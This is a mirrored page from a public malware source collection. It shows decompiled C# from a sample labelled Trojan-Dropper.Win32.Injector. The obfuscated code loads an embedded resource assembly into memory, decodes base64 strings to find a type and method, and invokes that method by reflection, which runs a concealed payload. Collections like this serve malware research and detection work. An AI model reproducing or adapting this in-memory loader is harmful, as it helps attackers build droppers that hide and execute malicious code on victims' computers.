mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
21 lines
853 B
C#
21 lines
853 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: Feon, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: AF8034ED-5A2C-4122-9E1B-F560737FA983
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.exwr-69a114df5525bb71f18484f15cb4dd44f7c416f26c41b8af17d2ce1b2774383e.exe
|
|||
|
|
|||
|
using Feon.Properties;
|
|||
|
using System;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
internal sealed class \uE000
|
|||
|
{
|
|||
|
static \uE000() => \uE009.\uE000();
|
|||
|
|
|||
|
private static void Main() => \uE000.\uE000();
|
|||
|
|
|||
|
private static void \uE000() => AppDomain.CurrentDomain.Load(Resources.\uE001).GetType(\uE000.\uE001(\uE008.\uE000(0))).GetMethod(\uE000.\uE001(\uE008.\uE000(29))).Invoke((object) null, (object[]) null);
|
|||
|
|
|||
|
public static string \uE001(string _param0) => Encoding.UTF8.GetString(Convert.FromBase64String(_param0));
|
|||
|
}
|